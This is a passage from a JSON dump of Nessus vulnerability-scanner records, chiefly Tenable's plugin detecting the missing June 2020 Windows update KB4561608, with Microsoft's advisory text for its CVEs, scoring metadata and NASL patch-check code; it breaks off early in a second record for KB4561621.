vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1274, CVE-2020-1276, CVE-2020-1316)\n\n - A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-1277, CVE-2020-1302, CVE-2020-1312)\n\n - An information disclosure vulnerability exists in the way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this vulnerability could determine the origin of all webpages in the affected browser. (CVE-2020-1242)\n\n - An elevation of privilege vulnerability exists when an OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when Group Policy improperly checks access. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when Windows Lockscreen fails to properly load spotlight images from a secure location. An attacker who successfully exploited the vulnerability could execute commands with elevated permissions. An authenticated attacker could modify a registry value to exploit this vulnerability. The security update addresses the vulnerability by ensuring that the spotlight images are always loaded from a secure location. (CVE-2020-1279)\n\n - An elevation of privilege vulnerability exists in OpenSSH for Windows when it does not properly restrict access to configuration settings. An attacker who successfully exploited this vulnerability could replace the shell with a malicious binary. (CVE-2020-1292)\n\n - An elevation of privilege vulnerability exists in the way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when Windows Modules Installer Service improperly handles class object members. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. The update addresses the vulnerability by correcting how Windows handles calls to preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when Component Object Model (COM) client uses special case IIDs. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251, CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1258)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting improperly handles objects in memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge (Chromium-based) in IE Mode improperly handles specific redirects. An attacker who successfully exploits the IE Mode vulnerability could trick a user into believing that the user was on a legitimate website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the Windows Shell does not properly validate file paths. An attacker who successfully exploited this vulnerability could run arbitrary code in the context of the current user. If the current user is logged on as an administrator, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with elevated privileges. Users whose accounts are configured to have fewer privileges on the system could be less impacted than users who operate with administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in Windows Text Service Framework (TSF) when the TSF server fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this vulnerability could run arbitrary code in a privileged process. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1314)\n\n - A denial of service vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could cause a system to stop responding. (CVE-2020-1244)", "cvss3": {}, "published": "2020-06-09T00:00:00", "type": "nessus", "title": "KB4561608: Windows 10 Version 1809 and Windows Server 2019 June 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0915", "CVE-2020-0916", "CVE-2020-0986", "CVE-2020-1073", "CVE-2020-1160", "CVE-2020-1162", "CVE-2020-1194", "CVE-2020-1196", "CVE-2020-1197", "CVE-2020-1201", "CVE-2020-1202", "CVE-2020-1203", "CVE-2020-1204", "CVE-2020-1207", "CVE-2020-1208", "CVE-2020-1211", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1214", "CVE-2020-1215", "CVE-2020-1216", "CVE-2020-1217", "CVE-2020-1219", "CVE-2020-1220", "CVE-2020-1222", "CVE-2020-1230", "CVE-2020-1231", "CVE-2020-1232", "CVE-2020-1233", "CVE-2020-1234", "CVE-2020-1235", "CVE-2020-1236", "CVE-2020-1237", "CVE-2020-1238", "CVE-2020-1239", "CVE-2020-1241", "CVE-2020-1242", "CVE-2020-1244", "CVE-2020-1246", "CVE-2020-1247", "CVE-2020-1251", "CVE-2020-1253", "CVE-2020-1254", "CVE-2020-1255", "CVE-2020-1257", "CVE-2020-1258", "CVE-2020-1259", "CVE-2020-1260", "CVE-2020-1261", "CVE-2020-1262", "CVE-2020-1263", "CVE-2020-1264", "CVE-2020-1266", "CVE-2020-1269", "CVE-2020-1270", "CVE-2020-1271", "CVE-2020-1272", "CVE-2020-1274", "CVE-2020-1276", "CVE-2020-1277", "CVE-2020-1278", "CVE-2020-1279", "CVE-2020-1280", "CVE-2020-1281", "CVE-2020-1282", "CVE-2020-1283", "CVE-2020-1286", "CVE-2020-1287", "CVE-2020-1290", "CVE-2020-1291", "CVE-2020-1292", "CVE-2020-1293", "CVE-2020-1294", "CVE-2020-1296", "CVE-2020-1299", "CVE-2020-1300", "CVE-2020-1301", "CVE-2020-1302", "CVE-2020-1304", "CVE-2020-1305", "CVE-2020-1306", "CVE-2020-1309", "CVE-2020-1310", "CVE-2020-1311", "CVE-2020-1312", "CVE-2020-1314", "CVE-2020-1315", "CVE-2020-1316", "CVE-2020-1317", "CVE-2020-1324", "CVE-2020-1334", "CVE-2020-1348"], "modified": "2023-03-06T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUN_4561608.NASL", "href": "https://www.tenable.com/plugins/nessus/137256", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137256);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/06\");\n\n script_cve_id(\n \"CVE-2020-0915\",\n \"CVE-2020-0916\",\n \"CVE-2020-0986\",\n \"CVE-2020-1073\",\n \"CVE-2020-1160\",\n \"CVE-2020-1162\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1197\",\n \"CVE-2020-1201\",\n \"CVE-2020-1202\",\n \"CVE-2020-1203\",\n \"CVE-2020-1204\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1211\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1217\",\n \"CVE-2020-1219\",\n \"CVE-2020-1220\",\n \"CVE-2020-1222\",\n \"CVE-2020-1230\",\n \"CVE-2020-1231\",\n \"CVE-2020-1232\",\n \"CVE-2020-1233\",\n \"CVE-2020-1234\",\n \"CVE-2020-1235\",\n \"CVE-2020-1236\",\n \"CVE-2020-1237\",\n \"CVE-2020-1238\",\n \"CVE-2020-1239\",\n \"CVE-2020-1241\",\n \"CVE-2020-1242\",\n \"CVE-2020-1244\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1257\",\n \"CVE-2020-1258\",\n \"CVE-2020-1259\",\n \"CVE-2020-1260\",\n \"CVE-2020-1261\",\n \"CVE-2020-1262\",\n \"CVE-2020-1263\",\n \"CVE-2020-1264\",\n \"CVE-2020-1266\",\n \"CVE-2020-1269\",\n \"CVE-2020-1270\",\n \"CVE-2020-1271\",\n \"CVE-2020-1272\",\n \"CVE-2020-1274\",\n \"CVE-2020-1276\",\n \"CVE-2020-1277\",\n \"CVE-2020-1278\",\n \"CVE-2020-1279\",\n \"CVE-2020-1280\",\n \"CVE-2020-1281\",\n \"CVE-2020-1282\",\n \"CVE-2020-1283\",\n \"CVE-2020-1286\",\n \"CVE-2020-1287\",\n \"CVE-2020-1290\",\n \"CVE-2020-1291\",\n \"CVE-2020-1292\",\n \"CVE-2020-1293\",\n \"CVE-2020-1294\",\n \"CVE-2020-1296\",\n \"CVE-2020-1299\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1304\",\n \"CVE-2020-1305\",\n \"CVE-2020-1306\",\n \"CVE-2020-1309\",\n \"CVE-2020-1310\",\n \"CVE-2020-1311\",\n \"CVE-2020-1312\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1316\",\n \"CVE-2020-1317\",\n \"CVE-2020-1324\",\n \"CVE-2020-1334\",\n \"CVE-2020-1348\"\n );\n script_xref(name:\"MSKB\", value:\"4561608\");\n script_xref(name:\"MSFT\", value:\"MS20-4561608\");\n script_xref(name:\"IAVA\", value:\"2020-A-0247-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0248-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0256-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0051\");\n\n script_name(english:\"KB4561608: Windows 10 Version 1809 and Windows Server 2019 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4561608.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A vulnerability exists in the way the Windows\n Diagnostics & feedback settings app handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could cause additional diagnostic data\n from the affected device to be sent to Microsoft.\n (CVE-2020-1296)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1238,\n CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when\n Windows Mobile Device Management (MDM) Diagnostics\n improperly handles junctions. An attacker who\n successfully exploited this vulnerability could bypass\n access restrictions to delete files. (CVE-2020-1204)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Now Playing Session Manager handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1201)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-1283)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the Connected Devices Platform Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when\n Windows Kernel fails to properly sanitize certain\n parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1257, CVE-2020-1278,\n CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Bluetooth Service handles objects\n in memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1280)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could read memory that was freed and might run arbitrary\n code in an elevated context. An attacker could exploit\n this vulnerability by running a specially crafted\n application on the victim system. The update addresses\n the vulnerability by correcting the way the Windows\n Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability\n exists in Windows Security Health Service when handling\n certain objects in memory. (CVE-2020-1162,\n CVE-2020-1324)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235,\n CVE-2020-1282, CVE-2020-1304, CVE-2020-1306,\n CVE-2020-1334)\n\n - An elevation of privilege vulnerability exists when the\n Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1274, CVE-2020-1276, CVE-2020-1316)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1277,\n CVE-2020-1302, CVE-2020-1312)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. (CVE-2020-1242)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when\n Windows Lockscreen fails to properly load spotlight\n images from a secure location. An attacker who\n successfully exploited the vulnerability could execute\n commands with elevated permissions. An authenticated\n attacker could modify a registry value to exploit this\n vulnerability. The security update addresses the\n vulnerability by ensuring that the spotlight images are\n always loaded from a secure location. (CVE-2020-1279)\n\n - An elevation of privilege vulnerability exists in\n OpenSSH for Windows when it does not properly restrict\n access to configuration settings. An attacker who\n successfully exploited this vulnerability could replace\n the shell with a malicious binary. (CVE-2020-1292)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1258)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - A denial of service vulnerability exists when Connected\n User Experiences and Telemetry Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could cause a system to\n stop responding. (CVE-2020-1244)\");\n # https://support.microsoft.com/en-us/help/4561608/windows-10-update-kb4561608\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?42cd5594\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4561608.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1299\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1317\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-06';\nkbs = make_list(\n '4561608'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17763',\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4561608])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:01:26", "description": "The remote Windows host is missing security update 4561621.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the way that the wlansvc.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-1348)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when Microsoft Windows OLE fails to properly validate user input. An attacker could exploit the vulnerability to execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the way Windows Error Reporting (WER) handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1261, CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) IIS module improperly handles uploaded content. An attacker who successfully exploited this vulnerability could upload restricted file types to an IIS-hosted folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting manager improperly handles a process crash. An attacker who successfully exploited this vulnerability could delete a targeted file leading to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1291)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create 